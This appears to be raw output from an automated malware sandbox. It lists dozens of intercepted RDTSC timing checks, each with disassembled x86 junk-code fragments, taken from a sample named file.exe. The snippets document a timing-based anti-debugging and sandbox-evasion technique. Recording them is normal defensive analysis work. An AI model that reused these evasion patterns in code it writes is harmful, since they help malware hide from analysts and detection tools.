Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF7E0 second address: CDF7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a jng 00007FA22C835FA6h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFEA1 second address: CDFEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFEA7 second address: CDFEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFEAB second address: CDFEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE56A second address: CDE56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE56E second address: CDE58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE58C second address: CDE5A9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA22C835FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FA22C835FA8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FA22C835FA6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE37C3 second address: CE37D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007FA22C516E42h 0x0000000b jne 00007FA22C516E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE37D6 second address: CE37E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007FA22C835FA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE37E2 second address: CE380F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA22C516E46h 0x0000000e ja 00007FA22C516E3Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE380F second address: CE3815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3815 second address: CE3819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14402 second address: C1443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FB6h 0x00000009 popad 0x0000000a pop eax 0x0000000b jl 00007FA22C835FD4h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA22C835FB7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA3FC second address: CEA404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA404 second address: CEA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA40E second address: CEA414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9DAE second address: CE9DC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA22C835FAAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9DC4 second address: CE9DCE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9DCE second address: CE9E09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FAFh 0x00000007 jmp 00007FA22C835FAFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FA22C835FB2h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9E09 second address: CE9E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA22C516E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FA22C516E36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9F83 second address: CE9FA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA22C835FAEh 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9FA6 second address: CE9FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA108 second address: CEA12C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA22C835FB9h 0x00000008 jc 00007FA22C835FA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF84EA second address: CF84F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF84F2 second address: CF84FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF84FA second address: CF851D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA22C516E40h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF851D second address: CF8524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF8524 second address: CF852E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA22C516E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFC295 second address: CFC2A9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA22C835FAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFC2A9 second address: CFC2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA22C516E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02B62 second address: D02B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA22C835FAEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D02B70 second address: D02B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0A538 second address: D0A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E640 second address: D0E653 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FA22C516E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FDE2 second address: D0FDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16F75 second address: D16F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16F8D second address: D16F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16F91 second address: D16FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA22C516E46h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E3Fh 0x00000013 jmp 00007FA22C516E42h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16FD1 second address: D16FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D15CE2 second address: D15CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FA22C516E36h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16008 second address: D1600E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16182 second address: D1618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1618B second address: D16197 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D16197 second address: D161A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D161A1 second address: D161A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D161A5 second address: D161AF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA22C516E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A0B2 second address: D1A0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A0B6 second address: D1A0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA22C516E42h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A0C9 second address: D1A0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A0CF second address: D1A0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FA22C516E46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A0EC second address: D1A0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A0F1 second address: D1A0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA22C516E36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19C4E second address: D19C70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA22C835FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FA22C835FB3h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19DA3 second address: D19DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19DA7 second address: D19DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19DC4 second address: D19DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA22C516E3Eh 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007FA22C516E36h 0x00000016 push edx 0x00000017 jmp 00007FA22C516E48h 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19DF4 second address: D19DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D19DFA second address: D19E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA22C516E36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E65 second address: D26E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E6D second address: D26E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA22C516E3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A112 second address: D2A118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A118 second address: D2A127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D372A5 second address: D372AF instructions: 0x00000000 rdtsc 0x00000002 je 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A215 second address: D3A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A219 second address: D3A23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA22C835FB0h 0x0000000c jmp 00007FA22C835FACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A23E second address: D3A254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FA22C516E36h 0x0000000e jbe 00007FA22C516E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3A254 second address: D3A282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA22C835FB3h 0x0000000b jmp 00007FA22C835FB3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D545A5 second address: D545D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FA22C516E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007FA22C516E36h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA22C516E46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D545D2 second address: D545D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D545D7 second address: D545ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FA22C516E3Eh 0x00000008 jo 00007FA22C516E36h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D534E5 second address: D534FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C835FB0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5367E second address: D53689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53954 second address: D53958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53958 second address: D53969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA22C516E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53A8F second address: D53ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FA22C835FAAh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 jg 00007FA22C835FA6h 0x00000019 pop eax 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FA22C835FADh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53ABC second address: D53ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53ACA second address: D53ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D541AB second address: D541B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56F51 second address: D56F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56F57 second address: D56F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5A31A second address: D5A349 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C835FB9h 0x00000013 ja 00007FA22C835FACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5A349 second address: D5A34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0E3A second address: 54F0E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 mov eax, 0E935DAFh 0x0000000a pop esi 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007FA22C835FB0h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FA22C835FACh 0x0000001e sbb ecx, 0C3D9408h 0x00000024 jmp 00007FA22C835FABh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0E7C second address: 54F0ED2 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FA22C516E3Bh 0x0000000e and esi, 732B2C4Eh 0x00000014 jmp 00007FA22C516E49h 0x00000019 popfd 0x0000001a mov di, cx 0x0000001d popad 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA22C516E49h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0ED2 second address: 54F0ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0ED8 second address: 54F0EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F0EDC second address: 54F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov cl, 7Fh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0BC8 second address: 54E0C45 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA22C516E48h 0x00000008 xor cx, 0D78h 0x0000000d jmp 00007FA22C516E3Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 call 00007FA22C516E44h 0x0000001d mov edx, ecx 0x0000001f pop esi 0x00000020 mov ah, dl 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007FA22C516E46h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA22C516E47h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54E0C45 second address: 54E0C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5520775 second address: 552077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552077A second address: 5520812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0EF810C0h 0x00000008 jmp 00007FA22C835FB9h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA22C835FACh 0x00000018 xor si, 8238h 0x0000001d jmp 00007FA22C835FABh 0x00000022 popfd 0x00000023 mov ecx, 0D2B006Fh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b mov ax, bx 0x0000002e mov di, 7AB2h 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007FA22C835FB9h 0x00000039 mov ebp, esp 0x0000003b jmp 00007FA22C835FAEh 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA22C835FB7h 0x00000048 rdtsc
